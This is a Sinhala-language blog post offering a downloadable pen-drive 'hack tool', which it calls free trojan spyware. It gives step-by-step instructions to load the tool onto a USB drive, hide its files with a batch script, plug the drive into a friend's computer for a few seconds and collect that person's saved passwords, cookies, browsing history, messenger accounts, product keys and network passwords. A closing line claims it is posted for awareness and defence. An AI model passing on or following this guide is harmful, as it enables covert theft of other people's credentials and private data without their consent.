පෙන් එකෙන් හැක් කරමු

සොයන්න

1.7.11

ඔන්න යාලුවනේ අද මම දෙන්න යන්නේ ෆට්ට භාණ්ඩයක්.හැක් ටුල් එකක් කිසි ගින්නක් නැ computer එකේ තියෙන ඔක්කොම user name pass word ඔක්කොම අදිනවා.(torjan spy ware free)
මේකෙන් අදින සෙට් එක තමා මේ දාලා තියෙන්න.

  1. Visited Link List
  2. Internet Explora Cache List
  3. Internet Explora Password List
  4. Instance Massengers Account List
  5. Installed Windows Update List
  6. Mozilla cache List
  7. cookie list
  8. Mozilla History List
  9. Search Queary List
  10. Adapter Report
  11. Network Password Report
  12. TCP/UDP Port List
  13. Product Key List
  14. Protected Storage Password List
  15. PST password List
  16. Startup Programme List
  17. Video Cache List
හිතන්න එපා මම හදපු එකක් කියලා මේක මමත් ගත්තේ indian blog එකකින්.හරි ලේසි pen එක යාලුවාගේ computer එකට ගහලා තත් 8ක් විතර තියන්න විතරයි .තියෙන්නෙ.ඔක්කොම ටික පෙන් එකේ.
හරි අපි බලමු මේක කොහොමද කරන්නේ කියලා.
download link
http://www.duckload.com/download/5462540/MOULDER.rar
  1. මුලින්ම මෙතනින් ඕනි කරන ෆයිල් එක download කරගන්න.win rar වලින් තියෙන්නෙ එක නිසා right click කරලා extract කරලා ගන්න.
  2. එකෙ ඇතුලේ ඇති copy කියලා folder එකක් එකේ තියෙන ෆයිල් ටික කොපි කරලා පෙන් එකට දාගන්න .
  3. ඉට පස්සේ hide.bat කියලා තියෙන එක ක්ලික් කරලා රන් කරන්න .ඉට පස්සෙ පෙන් එකෙන් hide.bat file එක delete කරලා දාන්න.
  4. දැන් වැඩේ හරි.
  5. දැන් ගිහින් පෙන් එක ඕනි කරන computer එකට ගහලා. ඔයාට ඔනි වැඩක් කරගෙන.පස්සේ ඔයාගෙ machine එකට ගහන්න.
  6. දැන් චුටි වැඩක් කරන්න තියෙනවා. අපි කලින් extract කර ගත්ත folder එකේ ඇති  showh.bat කියලා ෆයිල් එකක්. එක දැන් ආයෙම කොපි කරලා පෙන් එකට පේස්ට් කරන්න.ඊට පස්සෙ run කරන්න.ඊට පස්සෙ refresh කරන්න.දැන් hide උන files පෙනෙයි.
දැන් copy  කියන folder එකේ ඇතුලේ  ඇති IMNEOWORLD කියලා folder එකක් එකේ තියෙනවා ඕනිකරන ඔක්කොම html file විදිහට. ක්ලික් කරලා බලාගන්න විතරයි තියෙන්නේ.
එහෙනම් අපි ගියා කස්ටියටම ජය වේවා!
මෙතනින් වැඩි විස්තර
http://moulderfiles.blogspot.com/2011/05/hacked-by-pen.html
*****************************
******************
****************
**********
සැ: යු : මෙය ඔබේ දැනුම හා මෙම හැක් ක්‍රම වලින් බේරිම සදහා පළකරන ලද්දක් බව කරුණාවෙන් සලකන්න


මෙහි upgraded version එක අවශය නම් moulderfiles.blogspot.comඑකෙන් ගන්න පුලුවන්

0 comments:

Post a Comment

පරිගණක උදවු ගැන ඔබේ අදහස

PCWorld නවතම පුවත්